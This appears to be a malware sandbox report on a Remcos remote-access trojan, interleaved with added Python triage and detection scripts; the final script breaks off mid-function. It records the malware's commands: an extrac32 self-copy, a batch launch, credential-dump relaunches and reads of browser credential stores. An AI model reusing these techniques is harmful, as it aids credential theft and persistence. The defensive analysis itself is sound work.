Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
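The signature lines in this section (and the command-line-argument lines that follow) are the report's table cells flattened by text extraction: the label of the Detail column is fused onto the end of the Source cell, and each entry drags along the id of the referencing function or a "Jump to behavior" link as trailing text. The Python below is an added example, not code from Joe Sandbox or from this report. It parses lines in that shape back into records and aggregates the indicators an analyst pulls first: YARA rule hits per memory region or dump, created mutexes (flagging the Rmc- prefix that Remcos uses for its default mutex name, which the Rmc-V052BG seen here matches), dropped files, child processes, per-routine API chains and the configuration strings referenced from one routine. The label list, the Rmc- heuristic and the INTERESTING_APIS table are the example's own assumptions; the sample input is constructed from lines of this report.

```python
import re
from collections import Counter, defaultdict

# Labels of the report's Detail column (this example's own list, not a Joe
# Sandbox API). Extraction dropped the cell boundary, so a label is fused
# onto the Source cell ("...sdmpBinary or memory string: ..."): split there.
DETAIL_LABELS = (
    "Binary or memory string", "Static PE information", "Matched rule",
    "Classification label", "Code function", "File created",
    "Mutant created", "Process created", "Command line argument",
)
_LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)"
    r"(?P<label>" + "|".join(re.escape(x) for x in DETAIL_LABELS) + r"):\s*"
    r"(?P<detail>.*)$"
)
# Trailing link residue: the referencing function id (process/snapshot
# prefix, hex address suffix, e.g. 4_2_0040E9C5) and the "Jump to behavior" link.
_TRAIL_RE = re.compile(
    r"^(?P<body>.*?)(?:,?(?P<fn>[0-9]+_[0-9]+_[0-9A-F]{8}))?(?:Jump to behavior)?$"
)

def parse_line(line):
    """Split one flattened line into source / label / detail / referencing fn."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    t = _TRAIL_RE.match(m.group("detail"))
    return {"source": m.group("source"), "label": m.group("label"),
            "detail": t.group("body"), "ref_fn": t.group("fn")}

def triage(lines):
    """Aggregate parsed records into the indicators an analyst wants first."""
    out = {
        "classification": None,
        "yara": defaultdict(set),     # rule name -> sources (regions/dumps) it hit
        "mutexes": [],
        "remcos_mutexes": [],         # heuristic: Remcos default mutex names start "Rmc-"
        "files_created": [],
        "processes_created": [],      # (image, command line)
        "api_chains": {},             # function id -> APIs it calls, in order
        "config_strings": Counter(),  # strings referenced from the config routine
    }
    for r in filter(None, map(parse_line, lines)):
        label, d = r["label"], r["detail"]
        if label == "Matched rule":
            out["yara"][d.split(" ", 1)[0]].add(r["source"])
        elif label == "Mutant created":
            name = d.rsplit("\\", 1)[-1]
            out["mutexes"].append(name)
            if name.startswith("Rmc-"):
                out["remcos_mutexes"].append(name)
        elif label == "File created":
            out["files_created"].append(d)
        elif label == "Process created":
            image, _, cmdline = d.partition(" ")
            out["processes_created"].append((image, cmdline))
        elif label == "Code function":
            fn, _, apis = d.partition(" ")
            out["api_chains"][fn] = [a for a in apis.split(",") if a]
        elif label == "Command line argument":
            out["config_strings"][d] += 1
        elif label == "Classification label":
            out["classification"] = d
    return out

# APIs worth a second look when they appear in one routine (example's own table).
INTERESTING_APIS = {
    "AdjustTokenPrivileges": "changes own token privileges (privilege name not in the report)",
    "CreateToolhelp32Snapshot": "enumerates running processes",
    "StartServiceW": "starts a service",
    "CoCreateInstance": "instantiates a COM object (the CMSTP UAC-bypass signature is COM based)",
}

def flag_api_chains(report):
    """Return {function id: [reasons]} for routines calling an interesting API."""
    hits = {}
    for fn, apis in report["api_chains"].items():
        why = [INTERESTING_APIS[a] for a in apis if a in INTERESTING_APIS]
        if why:
            hits[fn] = why
    return hits

# Constructed sample: lines copied from this report, in the flattened shape.
SAMPLE_LINES = [
    r"Source: SHEOrder-10524.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE",
    r"Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, license = Elastic License v2",
    r"Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, MITRE (T1218.003)",
    r"Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, license = Elastic License v2",
    r"Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/12@4/3",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417952",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040F474",
    r"Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\NullJump to behavior",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifMutant created: \Sessions\1\BaseNamedObjects\Rmc-V052BG",
    r"Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03",
    r'Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "',
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Software\4_2_0040E9C5",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_2_0040E9C5",
    r"Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_2_0040E9C5",
]

if __name__ == "__main__":
    rep = triage(SAMPLE_LINES)
    print("classification:", rep["classification"])
    for rule, srcs in sorted(rep["yara"].items()):
        print(f"yara {rule}: {len(srcs)} source(s)")
    print("mutexes:", rep["mutexes"], "remcos:", rep["remcos_mutexes"])
    print("files:", rep["files_created"], "processes:", rep["processes_created"])
    print("config strings:", dict(rep["config_strings"]))
    print("flagged routines:", flag_api_chains(rep))
```

The mutex name is the cheapest host-side pivot in this report: the same Rmc-V052BG string appears both as the created mutant and among the strings referenced from 4_2_0040E9C5, so it is part of the embedded configuration rather than a per-host value, and a hunt for a `Rmc-` mutex across the fleet will match other installs built from the same configuration. The API-chain flags only annotate what the report already lists; the privilege being requested is not visible in the report and the example does not guess it.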
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Software\ (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Rmc-V052BG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Exe (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Exe (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Rmc-V052BG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Inj (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Inj (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: 8SG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: exepath (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: 8SG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: exepath (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: licence (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: dMG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PSG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Administrator (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: User (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: del (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: del (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: del (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Software\ (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Rmc-V052BG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Exe (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Exe (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Rmc-V052BG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Inj (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: Inj (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: 8SG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: exepath (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: 8SG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: exepath (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: licence (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: dMG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PG (4_2_0040E9C5)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Command line argument: PSG (4_2_0040E9C5)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Administrator4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: User4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_2_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Software\4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Exe4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Rmc-V052BG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Inj4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: 8SG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: exepath4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: licence4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: dMG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: PSG4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: Administrator4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: User4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCommand line argument: del4_1_0040E9C5
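The strings Software\, Rmc-V052BG, exepath and licence that the implant compares against its command line are the names Remcos uses for its per-install key under HKCU\Software and for the two values it stores there: the path to its own executable (stored obfuscated) and its licence string. The script below is an added example, not code from this report or from Joe Sandbox. It parses a reg export style dump and flags HKCU\Software subkeys that carry both value names, which is the host-side check a responder would run on a machine suspected of carrying this sample. The dump is constructed for the example: the key name reuses the Rmc-V052BG string from the report, the value contents and the Contoso decoy key are invented, and the check assumes the value names are exactly exepath and licence.

```python
import re
from typing import Dict, List

# Constructed `reg export HKCU\Software` excerpt (not taken from the report).
# Rmc-V052BG, exepath and licence are strings listed in the report above;
# the value contents and the Contoso decoy key are invented.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Borland\Delphi\Locales]

[HKEY_CURRENT_USER\Software\Rmc-V052BG]
"exepath"=hex:4a,3b,9c,10,ff,00,12,34,\
  9e,7d,00,11
"licence"="1D3C8B1F1A2B3C4D5E6F708192A3B4C5"

[HKEY_CURRENT_USER\Software\Contoso\Updater]
"exepath"="C:\\Program Files\\Contoso\\updater.exe"
"""

# Value names Remcos writes under its HKCU\Software\<install name> key
# (assumed exact; both must be present before we call it a hit).
REMCOS_VALUE_NAMES = {"exepath", "licence"}

_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse [key] headers and "name"=data lines from a .reg export.

    A line ending in a backslash continues the previous value, which is how
    reg.exe wraps long hex: data. Value names are lower-cased so lookups are
    case-insensitive, matching the registry's own semantics.
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name").lower()] = m.group("data")
    return keys


def find_remcos_keys(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Return HKCU\\Software subkeys that carry both Remcos value names."""
    hits = []
    for key, values in keys.items():
        if (key.lower().startswith("hkey_current_user\\software\\")
                and REMCOS_VALUE_NAMES.issubset(values)):
            hits.append(key)
    return hits


if __name__ == "__main__":
    for hit in find_remcos_keys(parse_reg_export(SAMPLE_REG_EXPORT)):
        print("Remcos-style install key:", hit)
```

Requiring both names keeps a lone exepath value in some unrelated vendor key (the Contoso decoy) from firing; on a real host, pair the hit with the Run key entry and the file it points at before acting on it.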
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 identical entries collapsed)
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 identical entries collapsed)
Source: C:\Users\Public\Libraries\lhgtogaW.pif | System information queried: HandleInformation
Source: C:\Users\Public\Libraries\lhgtogaW.pif | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000006.00000002.1779576996.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: lhgtogaW.pif, 00000005.00000003.1793696078.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1795170664.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000003.1794124501.000000000220C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000005.00000003.1793767154.000000000220C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: lhgtogaW.pif, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SHEOrder-10524.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | File read: C:\Users\user\Desktop\SHEOrder-10524.exe
Source: unknown | Process created: C:\Users\user\Desktop\SHEOrder-10524.exe "C:\Users\user\Desktop\SHEOrder-10524.exe"
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
Source: unknown | Process created: C:\Users\Public\Libraries\Wagotghl.PIF "C:\Users\Public\Libraries\Wagotghl.PIF"
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
Source: unknown | Process created: C:\Users\Public\Libraries\Wagotghl.PIF "C:\Users\Public\Libraries\Wagotghl.PIF"
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte"
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi"
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Process created: C:\Users\Public\Libraries\lhgtogaW.pif C:\Users\Public\Libraries\lhgtogaW.pif
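The process chain above, rewritten as detection logic. This is an added example and not part of the Joe Sandbox report. It encodes the four observations that make the chain distinctive: the dropper copies itself with extrac32.exe /C /Y (a LOLBAS copy primitive that sidesteps copy and xcopy), the copy lands in C:\Users\Public\Libraries under a .pif extension, the .pif is launched from that folder, and it then relaunches its own image three times with /stext <temp file>, the "save as text" output switch of the NirSoft recovery tools whose code Remcos reuses for its browser and mail credential dumps (the Firefox profiles.ini read and the Chrome password_notes schema string listed earlier belong to that stage). The events are constructed for the example with invented pids and one benign notepad.exe row; the command lines are the ones the report lists, and the field names loosely follow Sysmon Event ID 1.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed process-creation events modelled on the chain in the report.
# pids and the notepad.exe row are invented; command lines are the report's.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Users\user\Desktop\SHEOrder-10524.exe",
     "cmd": r'"C:\Users\user\Desktop\SHEOrder-10524.exe"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" "'},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\SysWOW64\extrac32.exe",
     "cmd": r"C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF"},
    {"pid": 103, "ppid": 100, "image": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "cmd": r"C:\Users\Public\Libraries\lhgtogaW.pif"},
    {"pid": 104, "ppid": 103, "image": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "cmd": r'C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz"'},
    {"pid": 105, "ppid": 1, "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe"},
]

PUBLIC_DIR = "c:\\users\\public\\"
# Command lines in the report carry doubled backslashes in places, so the
# path regex accepts one or more separators between components.
_PUBLIC_RE = re.compile(r"c:\\+users\\+public\\+", re.I)
_STEXT_RE = re.compile(r"(^|\s)/stext(\s|$)", re.I)


def rule_image_in_public(ev: dict) -> bool:
    """Image lives under C:\\Users\\Public, a world-writable tree no user profile owns."""
    return ev["image"].lower().startswith(PUBLIC_DIR)


def rule_pif_image(ev: dict) -> bool:
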